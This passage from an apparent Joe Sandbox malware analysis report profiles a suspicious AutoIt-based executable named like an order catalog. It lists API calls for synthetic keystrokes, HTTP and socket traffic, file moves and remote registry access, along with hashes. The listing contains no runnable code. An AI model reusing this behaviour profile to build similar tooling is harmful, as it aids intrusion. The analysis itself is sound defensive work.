                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2014098862-0
                                                                                                • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                • String ID: AU3_FreeVar
                                                                                                • API String ID: 2184576858-771828931
                                                                                                • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                • String ID: close all
                                                                                                • API String ID: 4174999648-3243417748
                                                                                                • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                APIs
                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                • String ID:
                                                                                                • API String ID: 1291720006-3916222277
                                                                                                • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastselect
                                                                                                • String ID: HH
                                                                                                • API String ID: 215497628-2761332787
                                                                                                • Opcode ID: ff1936eb32129df0a81bb6878b4e085d819e9574a0390ee8e332862918087a10
                                                                                                • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                • Opcode Fuzzy Hash: ff1936eb32129df0a81bb6878b4e085d819e9574a0390ee8e332862918087a10
                                                                                                • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                • API String ID: 1729044348-3708979750
                                                                                                • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                APIs
                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Products Order Catalogs20242.exe,?,C:\Users\user\Desktop\Products Order Catalogs20242.exe,004A8E80,C:\Users\user\Desktop\Products Order Catalogs20242.exe,0040F3D2), ref: 0040FFCA
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2326526234-1173974218
                                                                                                • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                APIs
                                                                                                  • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                • _wcslen.LIBCMT ref: 004366DD
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                • GetLastError.KERNEL32 ref: 0043670F
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                • String ID: \
                                                                                                • API String ID: 321622961-2967466578
                                                                                                • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                • API String ID: 1038674560-2734436370
                                                                                                • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                                • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                                • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fec3643cca3ff1845a5d750544dd574bba968d1ed5ac835adc13dd2c8a8c9520
                                                                                                • Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
                                                                                                • Opcode Fuzzy Hash: fec3643cca3ff1845a5d750544dd574bba968d1ed5ac835adc13dd2c8a8c9520
                                                                                                • Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                • GetDC.USER32(00000000), ref: 00441585
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3864802216-0
                                                                                                • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                • ExitThread.KERNEL32 ref: 0041410F
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                • __freefls@4.LIBCMT ref: 00414135
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 1925773019-0
                                                                                                • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                APIs
                                                                                                • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                APIs
                                                                                                • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                • _memset.LIBCMT ref: 00464B92
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                • String ID:
                                                                                                • API String ID: 3424476444-0
                                                                                                • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-0
                                                                                                • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                Memory Dump Source
